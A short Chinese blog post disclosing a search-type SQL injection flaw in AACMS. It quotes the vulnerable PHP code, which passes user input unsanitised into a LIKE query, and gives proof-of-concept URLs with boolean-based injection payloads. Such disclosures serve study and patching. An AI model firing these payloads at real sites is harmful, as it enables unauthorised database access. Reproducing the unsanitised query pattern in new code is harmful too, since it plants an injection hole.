当前位置: iick's blog > 网站漏洞 > AACMS搜索型注入漏洞

AACMS搜索型注入漏洞

作者:hack1990 时间:11-09-25 阅读数:1714人阅读

include_once ''common.php'';

$keyword = $_REQUEST[''keyword'']; //.....!@#$%^&*

if(empty($keyword)) sexit($lang[''arg_error'']);
       
$where = '''';

$where .= " title LIKE ''%{$keyword}%''";//%模糊查询,。

$title = ''搜索'';

....
       
include template(''search'');

POC
http://127.0.0.1/search.php?keyword=w%''%20and%201=1%20and%20''%''=''  //and 1=1
http://127.0.0.1/search.php?keyword=w%''%20and%201=2%20and%20''%''=''  //and 1=2
http://127.0.0.1/search.php?keyword=AACMS搜索型注入漏洞{SQL}
 

# Nmap Security Scanner 7.0

上一篇:FeitecCMS V2.0 漏洞

下一篇:运行txt文本可中毒 微软急修“文本病毒”漏洞

相关文章

评论列表

  •  
    发布于 2011-09-30 11:08:58  回复
  • 不让复制,你也不是转载的!
    •  
      发布于 2011-10-01 02:31:56  回复
    • 自己不会复制怪谁
  •  
    发布于 2011-10-01 02:31:56  回复
  • 自己不会复制怪谁

发表评论